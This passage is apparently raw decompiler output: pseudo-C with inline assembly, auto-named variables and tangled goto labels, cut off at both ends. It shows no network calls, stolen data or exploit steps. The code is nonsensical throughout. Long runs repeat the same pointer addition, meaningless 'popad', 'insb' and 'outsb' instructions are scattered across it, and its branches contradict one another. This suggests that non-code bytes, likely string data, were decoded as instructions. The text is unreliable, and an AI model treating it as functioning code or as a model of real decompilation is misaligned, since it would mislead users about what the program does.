						 *((intOrPtr*)(_t332 + 0x269ca)) =  *((intOrPtr*)(_t332 + 0x269ca)) + _t332;
						asm("fsubr qword [ecx+0x2]");
						_t389 = _t388 + _t379;
						_t333 =  *_t389 * 0x21700;
						asm("sbb byte [eax], 0x2");
						 *((intOrPtr*)(_t333 - 0x7ffffde7)) =  *((intOrPtr*)(_t333 - 0x7ffffde7)) + _t333;
						asm("sbb al, [edx]");
						 *((intOrPtr*)(_t333 + 0x269f8)) =  *((intOrPtr*)(_t333 + 0x269f8)) + _t333;
						asm("sbb eax, [edx]");
						 *((intOrPtr*)(_t333 + 0x26a02)) =  *((intOrPtr*)(_t333 + 0x26a02)) + _t333;
						asm("sbb [edx+0x2], ch");
						 *((intOrPtr*)(_t396 - 0x777ffffe)) =  *((intOrPtr*)(_t396 - 0x777ffffe)) + _t333;
						_t334 = _t333 +  *_t333;
						 *_t334 =  *_t334 - 0x6a;
						_t335 = _t334 +  *_t334;
						_push(2);
						_t389[0x1a] = _t389[0x1a] + _t335;
						_t336 = _t335 +  *_t335;
						_push(_t389);
						_push(2);
						 *((intOrPtr*)(_t389 + _t336)) =  *((intOrPtr*)(_t389 + _t336)) + _t371;
						_t127 = _t336 + 0x26a64;
						 *_t127 =  *(_t336 + 0x26a64) + _t336;
						__eflags =  *_t127;
						if( *_t127 > 0) {
							_t345 = _t336 +  *_t336;
							__eflags = _t345 - 0x3e800002;
							_t346 = _t345 +  *_t345;
							 *0x130004D2 =  *((char*)(0x130004d2)) + 2;
							 *((intOrPtr*)(_t346 + 0x26a9a)) =  *((intOrPtr*)(_t346 + 0x26a9a)) + _t346;
							asm("lodsb");
							_push(2);
							 *0xFFFFFFFF810004D2 =  *((intOrPtr*)(0xffffffff810004d2)) + _t371;
							_t347 = _t346 +  *_t346;
							_t389[0] = _t389[0];
							 *(_t347 + _t347) =  *(_t347 + _t347) & 0x00000080;
							asm("int3");
							_push(2);
							_t348 = _t347 + _t371;
							_push(2);
							 *((intOrPtr*)(_t379 - 0x157ffffe)) =  *((intOrPtr*)(_t379 - 0x157ffffe)) + _t389;
							_push(2);
							 *0xFFFFFFFFD400026A =  *((intOrPtr*)(0xffffffffd400026a)) + _t348;
							 *((intOrPtr*)(_t348 - 0x7ffffd98)) =  *((intOrPtr*)(_t348 - 0x7ffffd98)) + _t348;
							asm("clc");
							_push(2);
							 *((intOrPtr*)(_t371 + _t461 * 2)) =  *((intOrPtr*)(_t371 + _t461 * 2)) + _t348;
							_t379 = _t379 -  *((intOrPtr*)(_t371 + 2));
							 *((intOrPtr*)(_t371 + _t461 * 2)) =  *((intOrPtr*)(_t371 + _t461 * 2)) + _t389;
							_push(2);
							 *((intOrPtr*)( *_t389 * 0x6b148000 +  *( *_t389 * 0x6b148000) +  *((intOrPtr*)( *_t389 * 0x6b148000 +  *( *_t389 * 0x6b148000))) - 0x7ffffd95)) =  *((intOrPtr*)( *_t389 * 0x6b148000 +  *( *_t389 * 0x6b148000) +  *((intOrPtr*)( *_t389 * 0x6b148000 +  *( *_t389 * 0x6b148000))) - 0x7ffffd95)) +  *_t389 * 0x6b148000 +  *( *_t389 * 0x6b148000) +  *((intOrPtr*)( *_t389 * 0x6b148000 +  *( *_t389 * 0x6b148000)));
							asm("sbb eax, 0x44800002");
							__eflags =  *_t389 * 0;
						}
						_push(_t474);
						 *((intOrPtr*)( *_t389 + 0x26b5e)) =  *((intOrPtr*)( *_t389 + 0x26b5e)) +  *_t389;
						_push(0x7600026b);
						 *((char*)(_t371 + 2)) =  *((char*)(_t371 + 2));
						_t341 =  *_t389 * 0 +  *( *_t389 * 0);
						 *_t341 =  *_t341;
						 *_t341 =  *_t341 + _t341;
						_push(_t371);
						_push(_t447);
						_t390 =  &(_t389[0]);
						_t464 =  &_v5;
						 *[ss:esi] =  *[ss:esi] ^ _t379;
						_t477 = _t474 + 1;
						 *_t341 =  *_t341 + _t341;
						__eflags =  *_t379 & _t341;
						_t398 = _t447;
						if(__eflags <= 0) {
							L34:
							_t379 = 0;
							_pop(_t398);
							if(__eflags <= 0) {
								L60:
								_pop(_t398);
								asm("popad");
								_push(0x5f);
								L61:
								asm("o16 jo 0x75");
								L62:
								if(__eflags < 0) {
									L92:
									if(__eflags < 0) {
										L114:
										 *((intOrPtr*)(_t398 + 0x43)) =  *((intOrPtr*)(_t398 + 0x43)) + _t371;
										_t379 = _t379 - 1;
										__eflags = _t379;
										if (_t379 >= 0) goto L135;
										L115:
										_t464 =  *_t447 * 0x5f006f00;
										__eflags = _t464;
									}
									asm("arpl [eax+eax], si");
									L94:
									 *_t341 =  *_t341 + 1;
									__eflags =  *_t341;
									_pop(_t398);
									if(__eflags <= 0) {
										L110:
										if(__eflags <= 0) {
											_pop(_t424);
											if(__eflags <= 0) {
												L155:
												_t341 = 1;
												asm("popad");
												_t398 = 0x5f;
												asm("o16 jo 0x64");
												if(__eflags == 0) {
													L176:
													if(__eflags < 0) {
														L198:
														if(__eflags <= 0) {
															L223:
															_pop(_t400);
															L224:
															if(__eflags <= 0) {
																L247:
																 *_t342 =  *_t342 + _t342;
																asm("lodsd");
																_t400[0x18] = _t400[0x18] + _t371;
																_push(0x5f);
																 *_t342 =  *_t342 + _t342;
																asm("stosd");
																_t255 =  &(_t400[0x18]);
																 *_t255 = _t400[0x18] + _t371;
																__eflags =  *_t255;
																_t400 = 0x5f;
																_t447 =  *[fs:esi+0x5f] * 0x72;
																_t257 =  &(_t400[0x17]);
																 *_t257 = _t400[0x17] + _t371;
																__eflags =  *_t257;
																if(__eflags <= 0) {
																	L271:
																	asm("aas");
																	_t272 =  &(_t400[0x17]);
																	 *_t272 = _t400[0x17] + _t371;
																	__eflags =  *_t272;
																	if (__eflags <= 0) goto L298;
																	L272:
																	asm("bound esp, [ecx+0x53]");
																}
																asm("popad");
																_push(_t447);
																asm("popad");
																if(__eflags < 0) {
																	L269:
																	_t400[0x10] = _t400[0x10] + _t371;
																	_t379 = _t379 - 1;
																	__eflags = _t379;
																	asm("popad");
																	if(__eflags == 0) {
																		_pop(_t400);
																		if(__eflags <= 0) {
																			L308:
																			 *_t341 =  *_t341 + _t341;
																			 *_t341 =  *_t341 + _t341;
																			 *_t341 =  *_t341 + _t341;
																			 *_t341 =  *_t341 + _t341;
																			__eflags =  *_t341;
																			L309:
																			 *_t341 =  *_t341 + _t341;
																			__eflags =  *_t341;
																		}
																		asm("popad");
																		__eflags = _t447 + 1;
																		if(_t447 + 1 < 0) {
																			goto L309;
																		}
																		L297:
																		__eflags = _t400 - 1;
																		asm("bound ebp, [edx]");
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		__eflags =  *_t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		__eflags =  *_t341;
																		L300:
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		__eflags =  *_t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		__eflags =  *_t341;
																		L302:
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		__eflags =  *_t341;
																		L303:
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		__eflags =  *_t341;
																		L304:
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		__eflags =  *_t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		__eflags =  *_t341;
																		L306:
																		 *_t341 =  *_t341 + _t341;
																		__eflags =  *_t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		 *_t341 =  *_t341 + _t341;
																		__eflags =  *_t341;
																		goto L308;
																	}
																	asm("outsb");
																	 *_t400 =  *_t400 + _t371;
																	__eflags =  *_t400;
																	goto L271;
																}
																if(__eflags >= 0) {
																	L279:
																	_t379 = _t379 - 1;
																	__eflags = _t379;
																	asm("outsb");
																	if(_t379 == 0) {
																		goto L297;
																	}
																	_t342 = _t341 ^ 0x00000000;
																	__eflags = _t342;
																	L281:
																	 *_t342 =  *_t342 + _t342;
																	__eflags =  *_t342;
																	_t341 = 1;
																	asm("popad");
																	asm("insb");
																	asm("insb");
																	asm("insd");
																	if( *_t342 != 0) {
																		goto L303;
																	}
																	 *1 =  *1 + _t371;
																	_pop(_t400);
																	_t371 = _t371 + 1;
																	_t379 = _t379 - 1;
																	__eflags = _t379;
																	L283:
																	if(__eflags == 0) {
																		goto L302;
																	}
																	asm("outsb");
																	 *_t341 =  *_t341 + _t341;
																	__eflags =  *_t341;
																	L285:
																	_t275 =  &_a1985961724;
																	 *_t275 = _a1985961724 + _t390;
																	__eflags =  *_t275;
																	L286:
																	if(__eflags <= 0) {
																		goto L304;
																	}
																	asm("popad");
																	_t447 = _t447 + 1;
																	_push(_t341);
																	_t380 = _t379 - 1;
																	__eflags = _t380;
																	asm("outsb");
																	if (_t380 == 0) goto L288;
																	 *((intOrPtr*)(_t341 + _t341 + 0x5f)) =  *((intOrPtr*)(_t341 + _t341 + 0x5f)) + _t390;
																	_t371 = _t371 + 1;
																	__eflags = _t380 - 1;
																	if (__eflags < 0) goto L306;
																	L289:
																	if(__eflags < 0) {
																		goto L306;
																	}
																	 *_t341 =  *_t341 + _t341;
																	asm("scasd");
																	_t281 =  &(_t400[0x17]);
																	 *_t281 = _t400[0x17] + _t371;
																	__eflags =  *_t281;
																	L291:
																	if (__eflags <= 0) goto L305;
																	L292:
																	asm("bound esp, [ecx+0x46]");
																}
																_t447 = _t447 - 1;
																_t371 = _t371 + _t379;
																_t259 =  &(_t400[0x17]);
																 *_t259 = _t400[0x17] + _t371;
																__eflags =  *_t259;
																L252:
																if(__eflags <= 0) {
																	asm("sbb [ecx], eax");
																	_pop(_t400);
																	if(__eflags <= 0) {
																		goto L300;
																	}
																	asm("popad");
																	L278:
																	_push(_t390);
																	__eflags =  *((intOrPtr*)(_t379 + 0x6e)) - _t379;
																	goto L279;
																}
																asm("popad");
																_t379 = _t379 - 1;
																_t342 = _t341 ^ 0x00000056;
																__eflags = _t342;
																asm("popad");
																if (_t342 < 0) goto L254;
																_t261 = _t390 + 1;
																 *_t261 =  *(_t390 + 1) + _t342;
																__eflags =  *_t261;
																_pop(_t400);
																if(__eflags <= 0) {
																	goto L281;
																}
																asm("popad");
																_push(_t447);
																L257:
																asm("popad");
																if(__eflags < 0) {
																	goto L272;
																}
																if(__eflags != 0) {
																	goto L285;
																}
																_t263 = _t379 + 0x765f5f00;
																 *_t263 =  *(_t379 + 0x765f5f00) + _t379;
																__eflags =  *_t263;
																asm("bound esp, [ecx+0x46]");
																if(__eflags < 0) {
																	goto L278;
																}
																L261:
																_t341 = _t477;
																_t477 = _t342 ^ 0x00000000;
																_t266 =  &(_t400[0x17]);
																 *_t266 = _t400[0x17] + _t371;
																__eflags =  *_t266;
																L262:
																_pop(_t400);
																if(__eflags <= 0) {
																	goto L286;
																}
																L263:
																asm("popad");
																_push(_t447);
																asm("popad");
																if(__eflags < 0) {
																	goto L283;
																}
																if(__eflags >= 0) {
																	goto L292;
																}
																_t400 =  &(_t400[0]);
																_t371 = _t371 + _t371;
																_t268 =  &(_t400[0x17]);
																 *_t268 = _t400[0x17] + _t371;
																__eflags =  *_t268;
																if(__eflags <= 0) {
																	goto L289;
																}
																asm("popad");
																_t477 = _t477 - 1;
																asm("popad");
																if(__eflags == 0) {
																	goto L291;
																}
																asm("gs insd");
																L268:
																_t371 = _t371 + 1;
																asm("popad");
																asm("insb");
																asm("insb");
																 *[fs:eax] =  *[fs:eax] + _t341;
																__eflags =  *[fs:eax];
																_push(_t390);
																goto L269;
															}
															asm("popad");
															_push(_t447);
															asm("popad");
															if(__eflags < 0) {
																L235:
																if(__eflags < 0) {
																	goto L257;
																}
																_t371 = _t371 + 1;
																__eflags = _t371;
															}
															_push(_t447);
															asm("arpl [gs:eax], ax");
															_t246 = _t379 + 0x64615f01;
															 *_t246 =  *(_t379 + 0x64615f01) + _t379;
															__eflags =  *_t246;
															__eflags = _t341 & 0x64615f01;
															_push(0x5f);
															_t447 =  *[fs:esi+0x5f] * 0x336d;
															__eflags =  *[fs:esi+0x5f] * 0x336d;
															asm("insd");
															_t341 =  *_t341 * 0x5f01ae00;
															__eflags = _t341;
															asm("popad");
															_t400 = 0x5f;
															_t447 =  *[fs:esi+0x72] * 0x00006d5f ^  *_t390;
															__eflags = _t447;
															L230:
															_t379 = _t379 ^  *_t379;
															__eflags = _t379;
															L231:
															asm("aaa");
															_t250 =  &(_t400[0x17]);
															 *_t250 = _t400[0x17] + _t371;
															__eflags =  *_t250;
															L232:
															_pop(_t400);
															if(__eflags <= 0) {
																goto L252;
															}
															asm("popad");
															_push(_t371);
															if (__eflags == 0) goto L257;
															goto L235;
														}
														L199:
														asm("popad");
														_push(_t464);
														asm("bound ebp, [edi+0x75]");
														asm("outsb");
														L200:
														 *[fs:eax+0x1] =  *[fs:eax+0x1] + _t371;
														__eflags =  *[fs:eax+0x1];
														L201:
														_pop(_t400);
														if (__eflags <= 0) goto L227;
														L202:
														asm("bound esp, [ecx+0x56]");
													}
													L177:
													if(__eflags < 0) {
														goto L199;
													}
													asm("popad");
													asm("arpl [ebp], sp");
													es =  *_t341;
													L179:
													_pop(_t400);
													if(__eflags <= 0) {
														goto L200;
													}
													asm("popad");
													_t464 =  &_v3;
													__eflags = _t464;
													if(__eflags < 0) {
														goto L201;
													}
													if(__eflags < 0) {
														_a1985961724 = _a1985961724 + _t379;
														asm("bound esp, [ecx+0x45]");
													}
													_t341 = _t341 - 1;
													asm("popad");
													asm("outsb");
													L183:
													asm("fs insb");
													if (__eflags < 0) goto L184;
													 *(_t379 + 0x64615f01) =  *(_t379 + 0x64615f01) + _t390;
													_push(0x5f);
													asm("o16 jo 0x75");
													asm("gs insd");
													 *_t341 =  *_t341 + _t341;
													__eflags =  *_t341;
													L185:
													asm("scasd");
													 *((intOrPtr*)(_t398 + 0x61)) =  *((intOrPtr*)(_t398 + 0x61)) + _t371;
													_push(0x5f);
													_t447 =  *[fs:esi+0x72] * 0x6d5f;
													__eflags = _t447;
													L186:
													if(__eflags < 0) {
														if(__eflags < 0) {
															goto L231;
														}
														if(__eflags < 0) {
															goto L232;
														}
														asm("insb");
														asm("outsd");
														if (__eflags > 0) goto L213;
														 *(_t390 + 0x765f5f00) =  *(_t390 + 0x765f5f00) + _t371;
														asm("bound esp, [ecx+0x46]");
														L214:
														asm("popad");
														_t447 = _t447 + 1;
														__eflags = _a75 * 0x6e6570;
														L215:
														asm("gs outsb");
														_t341 = _t341 + _t390;
														_t238 = _t398 + 0x5f;
														 *_t238 =  *(_t398 + 0x5f) + _t371;
														__eflags =  *_t238;
														if(__eflags <= 0) {
															_push(_t371);
															if(__eflags == 0) {
																goto L262;
															}
															_t477 = _t477 - 1;
															_t447 =  *(_t371 + 0x74) * 0x870000;
															__eflags = _t447;
															_pop(_t400);
															L242:
															if(__eflags <= 0) {
																goto L261;
															}
															asm("popad");
															_t477 = _t477 + 1;
															if(__eflags < 0) {
																goto L263;
															}
															_t379 = _t379 + 1;
															__eflags = _t379;
															L245:
															_t379 = _t379 + 1;
															__eflags = _t379;
															if(_t379 < 0) {
																goto L268;
															}
															 *_t342 =  *_t342 ^ _t342;
															__eflags =  *_t342;
															goto L247;
														}
														asm("popad");
														_t379 = _t379 - 1;
														__eflags = _t379;
														asm("outsb");
														_push(_t371);
														L217:
														if(__eflags == 0) {
															goto L245;
														}
														 *_t341 =  *_t341 + _t341;
														__eflags =  *_t341 & 0x62765f5f;
														L220:
														_pop(_t400);
														if(__eflags <= 0) {
															goto L242;
														}
														asm("popad");
														_t447 = _t447 - 1;
														__eflags = _t447;
														if(_t447 > 0) {
															goto L230;
														}
														_t242 = _t379 + _t341 + 0x5f;
														 *_t242 =  *(_t379 + _t341 + 0x5f) + _t390;
														__eflags =  *_t242;
														goto L223;
													}
													asm("insd");
													_t341 = _t341 ^ 0x00000000;
													__eflags = _t341;
													L188:
													 *_t341 =  *_t341 + _t341;
													_t223 = _t341;
													_t341 = _t371;
													_t371 = _t223;
													_t224 = _t398 + 0x5f;
													 *_t224 =  *(_t398 + 0x5f) + _t371;
													__eflags =  *_t224;
													if( *_t224 <= 0) {
														goto L214;
													}
													asm("popad");
													_t447 = _t447 + 1;
													_push(_t341);
													__eflags =  &_v3;
													if(__eflags < 0) {
														goto L215;
													}
													if(__eflags < 0) {
														goto L220;
													}
													_t464 =  *(_t398 + 0x6e) * 0x1490000;
													__eflags = _t464;
													_pop(_t400);
													if(__eflags <= 0) {
														goto L217;
													}
													asm("popad");
													_push(_t371);
													L193:
													if(__eflags == 0) {
														goto L224;
													}
													_push(_t447);
													asm("popad");
													if (__eflags < 0) goto L216;
													L195:
													_push(_t447);
												}
												L157:
												asm("outsb");
												 *_t371 =  *_t371 + _t341;
												_t207 = _t398 + 0x5f;
												 *_t207 =  *(_t398 + 0x5f) + _t371;
												__eflags =  *_t207;
												if(__eflags <= 0) {
													goto L179;
												}
												asm("popad");
												_push(_t390);
												_t464 =  *[fs:ebp] * 0x5f014100;
												__eflags = _t464;
												L159:
												 *_t341 =  *_t341 + _t341;
												_t379 = _t379 + 1;
												_t209 = _t398 + 0x5f;
												 *_t209 =  *(_t398 + 0x5f) + _t371;
												__eflags =  *_t209;
												L160:
												if(__eflags <= 0) {
													goto L183;
												}
												asm("popad");
												_push(_t371);
												if(__eflags == 0) {
													goto L185;
												}
												_push(_t390);
												L163:
												__eflags =  *_t341 - _t341;
												 *0x45564500 =  *0x45564500 + _t390;
												_push(_t477);
												_push(_t371);
												_t379 = _t379 - 1;
												_t447 = _t447;
												__eflags = _t447;
												L164:
												_t371 = _t371 - 1;
												__eflags = _t371;
												_pop(_t398);
												_push(_t390);
												L165:
												asm("gs insb");
												asm("popad");
												if(__eflags >= 0) {
													goto L186;
												}
												 *_t341 =  *_t341 + _t341;
												__eflags =  *_t341;
												L167:
												_t477 = _t477 - 1;
												_t211 = _t398 + 0x5f;
												 *_t211 =  *(_t398 + 0x5f) + _t371;
												__eflags =  *_t211;
												if( *_t211 <= 0) {
													goto L188;
												}
												asm("popad");
												_push(_t464);
												_t379 = _t379 - 1;
												__eflags = _t379;
												L169:
												_t213 = _t379 + 0x32;
												 *_t213 =  *(_t379 + 0x32) ^ _t379;
												__eflags =  *_t213;
												L170:
												 *_t341 =  *_t341 + _t341;
												_push(_t398);
												 *((intOrPtr*)(_t398 + 0x43)) =  *((intOrPtr*)(_t398 + 0x43)) + _t371;
												_t379 = _t379 - 1;
												__eflags = _t379;
												if(__eflags >= 0) {
													goto L193;
												}
												if(__eflags < 0) {
													goto L195;
												}
												_t217 = _t341 + _t341;
												 *_t217 =  *(_t341 + _t341) + _t390;
												__eflags =  *_t217;
												L173:
												_push(_t447);
												_t464 =  &_v3;
												_push(_t477);
												_t379 = _t379 - 1;
												_t447 = _t447;
												_t371 = _t371 - 1;
												__eflags = _t371;
												_t400 = _t371;
												_push(_t379);
												if(__eflags != 0) {
													asm("insb");
													 *_t341 =  *_t341 + _t341;
													_push(_t379);
													_t227 =  &(_t400[0x17]);
													 *_t227 = _t400[0x17] + _t371;
													__eflags =  *_t227;
													goto L198;
												}
												if(__eflags < 0) {
													goto L202;
												}
												_t379 = _t379 - 1;
												__eflags = _t379;
												asm("outsb");
												if (__eflags == 0) goto L198;
												goto L176;
											}
											asm("popad");
											__eflags = _t424 + 1;
											if(__eflags == 0) {
												L145:
												if (__eflags >= 0) goto L147;
												_t379 = _t379 + _t341;
												__eflags = _t379;
												asm("lds eax, [eax]");
												_pop(_t398);
												if(__eflags <= 0) {
													goto L167;
												}
												asm("popad");
												_t379 = _t379 - 0x00000001 ^  *(_t379 - 1 + 0x34);
												 *_t379 =  *_t379 + _t341;
												_t201 = _t398 + 0x5f;
												 *_t201 =  *(_t398 + 0x5f) + _t371;
												__eflags =  *_t201;
												if(__eflags <= 0) {
													goto L170;
												}
												L149:
												asm("popad");
												_t419 = _t398 - 1;
												asm("bound ebp, [edx+0x56]");
												asm("popad");
												L150:
												if (__eflags < 0) goto L151;
												_t341 = _t341 + 1;
												_t203 = _t419 + 0x5f;
												 *_t203 =  *(_t419 + 0x5f) + _t371;
												__eflags =  *_t203;
												if(__eflags <= 0) {
													goto L173;
												}
												asm("popad");
												_push(_t371);
												if(__eflags == 0) {
													goto L177;
												}
												_push(_t390);
												_t344 = _t341 ^ 0x00000000;
												_t205 = _t344 + 0x64615f01;
												 *_t205 =  *(_t344 + 0x64615f01) + _t390;
												__eflags =  *_t205;
												goto L155;
											}
											_t194 = _t379 + _t341;
											 *_t194 =  *(_t379 + _t341) + _t390;
											__eflags =  *_t194;
											_pop(_t398);
											if(__eflags <= 0) {
												goto L157;
											}
											asm("popad");
											_push(_t371);
											if(__eflags == 0) {
												goto L160;
											}
											asm("insd");
											if (__eflags < 0) goto L137;
											_pop(_t371);
											_t196 = _t398 + 0x5f;
											 *_t196 =  *(_t398 + 0x5f) + _t371;
											__eflags =  *_t196;
											if( *_t196 <= 0) {
												goto L159;
											}
											asm("popad");
											_t379 = _t379 + 1;
											__eflags = _t379;
											if(__eflags < 0) {
												goto L164;
											}
											_t371 = _t371 + 1;
											asm("outsd");
											L140:
											asm("outsb");
											if(__eflags >= 0) {
												goto L164;
											}
											if(__eflags < 0) {
												goto L165;
											}
											asm("arpl [edx+esi], si");
											_t198 = _t371 + 0x765f5f01;
											 *_t198 =  *(_t371 + 0x765f5f01) + _t390;
											__eflags =  *_t198;
											asm("bound esp, [ecx+0x56]");
											asm("popad");
											if(__eflags < 0) {
												goto L163;
											}
											if(__eflags >= 0) {
												goto L169;
											}
											_t464 =  &_v3;
											__eflags = _t464;
											goto L145;
										}
										asm("popad");
										_t447 = _t447 + 1;
										__eflags = _t447;
										if(__eflags < 0) {
											L126:
											asm("outsb");
										}
										L112:
										__eflags =  *_t341 - _t341;
										L113:
										 *_t447 =  *_t447 + _t390;
										__eflags =  *_t447;
										goto L114;
									}
									asm("popad");
									_t398 = _t398 - 1;
									__eflags = _t398;
									asm("bound ebp, [edx+0x53]");
									if (_t398 == 0) goto L96;
									L96:
									_t341 = _t341 +  *_t379;
									__eflags = _t341;
									L97:
									_t180 = _t398 + 0x5f;
									 *_t180 =  *(_t398 + 0x5f) + _t371;
									__eflags =  *_t180;
									if( *_t180 <= 0) {
										goto L115;
									}
									L98:
									asm("popad");
									L99:
									_t398 = _t398 - 1;
									asm("outsb");
									_t464 =  &_v3;
									__eflags = _t464;
									if(__eflags < 0) {
										if(__eflags <= 0) {
											goto L140;
										}
										asm("popad");
										_t455 = _t447 + 1;
										__eflags = _a63 * 0x65736f6c;
										L121:
										 *_t341 =  *_t341 + _t341;
										asm("adc [eax], eax");
										_push(_t455);
										_t464 =  &_v3;
										_push(_t477);
										_t379 = _t379 - 1;
										_t447 = _t455;
										_t371 = _t371 - 1;
										__eflags = _t371;
										_t422 = _t371;
										L122:
										_t379 = _t379 + 1;
										_push(_t390);
										asm("o16 add [gs:eax+eax+0x62765f5f], dh");
										asm("popad");
										_t398 = _t422 + 1;
										__eflags = _t398;
										asm("gs outsb");
										if(__eflags < 0) {
											goto L149;
										}
										if(__eflags == 0) {
											goto L150;
										}
										_t390 = _t390 + 1;
										__eflags = _t390;
										L125:
										asm("outsd");
										if (__eflags != 0) goto L154;
										goto L126;
									}
									asm("outsd");
									if (__eflags < 0) goto L101;
									 *((intOrPtr*)(_t398 + 0x64615f01)) =  *((intOrPtr*)(_t398 + 0x64615f01)) + _t341;
									_push(0x5f);
									__eflags =  *[fs:esi+0x5f] * 0x316d;
									L102:
									_t447 =  *[fs:esi+0x5f] * 0x6936316d;
									__eflags = _t447;
									L103:
									_t455 =  *(_t447 + 0x5f) * 0x6936316d;
									 *_t341 =  *_t341 + _t341;
									 *_t379 =  *_t379 + _t341;
									__eflags =  *_t379;
									_pop(_t429);
									if( *_t379 <= 0) {
										goto L121;
									}
									L104:
									asm("popad");
									_t398 = _t429 - 1;
									__eflags = _t398;
									asm("bound ebp, [edx+0x53]");
									if(__eflags == 0) {
										asm("bound esp, [ecx+0x43]");
									}
									if (__eflags < 0) goto L122;
									L106:
									if(__eflags < 0) {
										goto L122;
									}
									asm("o16 add [ecx+eax+0x6a64615f], ch");
									_t447 =  *[fs:esi+0x72] * 0x6d5f;
									 *_t447 =  *_t447 ^ _t447;
									__eflags =  *_t447;
									L108:
									_t341 =  *_t341 * 0x5f5f0094;
									__eflags = _t341;
									if(__eflags <= 0) {
										goto L125;
									}
									asm("popad");
									_t447 = _t447 + 2;
									__eflags =  *_t341 * 0x5f00ab00;
									_t398 = _t341;
									goto L110;
								}
								asm("insd");
								 *_t341 =  *_t341 ^ _t341;
								_t341 = _t341 ^  *_t379;
								__eflags = _t341;
								_pop(_t398);
								L64:
								if(__eflags <= 0) {
									goto L94;
								}
								asm("popad");
								L66:
								_push(_t371);
								if(__eflags == 0) {
									goto L98;
								}
								_t371 = _t371 + 1;
								__eflags = _t371;
								asm("popad");
								if (_t371 == 0) goto L68;
								asm("rol byte [eax], 0x5f");
								L69:
								_t174 = _t398 + 0x5f;
								 *_t174 =  *(_t398 + 0x5f) + _t371;
								__eflags =  *_t174;
								if( *_t174 <= 0) {
									goto L96;
								}
								L70:
								asm("popad");
								_t341 = _t341 - 1;
								__eflags = _t341;
								if(__eflags < 0) {
									goto L99;
								}
								if(__eflags >= 0) {
									goto L103;
								}
								asm("insb");
								if(__eflags == 0) {
									L91:
									if(__eflags >= 0) {
										goto L112;
									}
									goto L92;
								}
								_push(0x4f6b6365);
								L74:
								asm("arpl [ebx+0x4f], bp");
								L75:
								asm("bound ebp, [edx]");
								_t390 = _t390 + _t379;
								__eflags = _t390;
								L76:
								L77:
								L78:
								_pop(_t422);
								if(__eflags <= 0) {
									goto L102;
								}
								asm("popad");
								_t477 = _t477 - 1;
								asm("gs outsb");
								_t390 = _t390 + 1;
								__eflags = _t390;
								if(__eflags >= 0) {
									goto L106;
								}
								if(__eflags < 0) {
									goto L97;
								}
								_t371 = _t371 + _t379;
								__eflags = _t371;
								L82:
								_pop(_t429);
								if(__eflags <= 0) {
									goto L104;
								}
								asm("popad");
								L85:
								_t477 = _t477 - 1;
								L86:
								asm("gs outsb");
								L87:
								asm("outsb");
								_push(_t447);
								asm("popad");
								if (__eflags < 0) goto L88;
								__eflags = _t341 & 0x00000001;
								_pop(_t398);
								asm("popad");
								_t447 =  *[fs:esi+0x5f] * 0x336d;
								_t341 = _t341 ^  *_t341;
								_t464 = 0x5f;
								_t178 = _t398 + 0x5f;
								 *_t178 =  *(_t398 + 0x5f) + _t371;
								__eflags =  *_t178;
								if( *_t178 <= 0) {
									goto L108;
								}
								asm("popad");
								_t379 = _t379 + 1;
								__eflags = _t379;
								if(__eflags < 0) {
									goto L113;
								}
								_t477 = _t477 + 1;
								if (__eflags >= 0) goto L112;
								goto L91;
							}
							asm("popad");
							L36:
							_t447 = _t447 + 1;
							__eflags = _t447;
							if(__eflags < 0) {
								goto L62;
							}
							_push(_t447);
							asm("popad");
							if (__eflags < 0) goto L39;
							L38:
							 *_t341 =  *_t341 + _t341;
							__eflags =  *_t341;
							 *_t398 =  *_t398 + _t371;
							__eflags =  *_t398;
							_pop(_t398);
							if(__eflags <= 0) {
								goto L64;
							}
							asm("popad");
							_t379 = _t379 + 1;
							__eflags = _t379;
							if(_t379 < 0) {
								goto L74;
							}
							_t464 =  &_v5;
							__eflags = _t464;
							asm("outsd");
							if(_t464 <= 0) {
								goto L69;
							}
							 *_t341 =  *_t341 + _t341;
							_t341 = _t341 - 1;
							_t167 = _t398 + 0x5f;
							 *_t167 =  *(_t398 + 0x5f) + _t371;
							__eflags =  *_t167;
							if(__eflags <= 0) {
								goto L70;
							}
							asm("popad");
							_push(_t371);
							if(__eflags == 0) {
								goto L77;
							}
							_push(_t447);
							asm("popad");
							if(__eflags < 0) {
								goto L66;
							}
							asm("outsd");
							if(__eflags <= 0) {
								goto L75;
							}
							_t379 = _t379 + _t379;
							_t169 = _t398 + 0x5f;
							 *_t169 =  *(_t398 + 0x5f) + _t371;
							__eflags =  *_t169;
							L47:
							if(__eflags <= 0) {
								goto L76;
							}
							asm("popad");
							_t477 = _t477 - 1;
							asm("gs outsb");
							_t390 = _t390 + 1;
							__eflags = _t390;
							if (__eflags >= 0) goto L87;
							L49:
							if(__eflags == 0) {
								goto L87;
							}
							if(__eflags < 0) {
								goto L86;
							}
							 *_t341 =  *_t341 + _t341;
							__eflags =  *_t341;
